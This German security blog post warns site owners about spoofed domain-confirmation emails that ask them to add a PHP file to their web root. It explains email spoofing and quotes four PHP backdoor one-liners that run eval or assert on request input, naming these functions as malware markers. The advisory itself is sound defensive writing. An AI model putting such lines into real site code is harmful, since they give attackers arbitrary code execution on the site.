Vertrauen Sie diesen gefälschten Domain-Bestätigungs-E-Mails nicht
Wenn Sie jemals einen Brief erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie ihn ignorieren
English version: Do not trust those fake domain confirmation emails
Kürzlich haben einige meiner Kunden seltsame E-Mail-Briefe von ihren Domain-Registraren erhalten. Diese Briefe enthalten eine Bitte um Bestätigung eigener Domains. Ich überprüfte einen dieser Briefe und identifizierte ihn schnell als betrügerischen Brief . Alle Buchstaben haben ein identisches Muster und eine Aufforderung, eine PHP-Datei im Stammordner einer Website mit einem bestimmten Namen und dem angegebenen Inhalt zu erstellen. Unnötig zu sagen, dass der vorgeschlagene Inhalt für diese PHP-Datei schädlichen Code enthält, der als Backdoor-Code bekannt ist. Diese Art von Code ermöglicht es dem Angreifer, jede gewünschte Aktion auf der Website eines Opfers auszuführen.
Wenn Sie jemals einen Brief erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie ihn ignorieren. Keine Ausnahmen. Auch wenn der Brief vom Präsidenten oder deiner Mutter kommt.
Betrügerische Briefe erscheinen aufgrund der legitimen Absender-E-Mail-Adresse legitim. Aber es ist ein E-Mail-Spoofing. Sie erwarten nicht, eine gefälschte E-Mail von Ihren Freunden oder Ihrem Domain-Registrar zu erhalten. Rechts? NEIN! Jeder E-Mail-Brief kann eine beliebige Absender-E-Mail-Adresse enthalten. Die überwiegende Mehrheit der E-Mail-Server und E-Mail-Clients überprüft oder verifiziert die Absenderadresse nicht. Sie sehen es also als von einem Hacker gesucht. Sie dürfen einem E-Mail-Brief, den Sie von einem bekannten Absender erhalten haben, nicht vertrauen, wenn der Brief eine Aufforderung zu einer verdächtigen Aktion wie der Installation von Code auf Ihrer Website oder Anwendung auf Ihrem Computer enthält.
Technische Details
Gefälschte E-Mails enthalten normalerweise einige der folgenden PHP-Zeilen.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
FYI: base64_decode, eval und assert sind bekannte Marker für verdächtigen oder bösartigen PHP-Code.
Siehe auch: Plugin Inspector deckt Sicherheitsprobleme mit anderen Plugins auf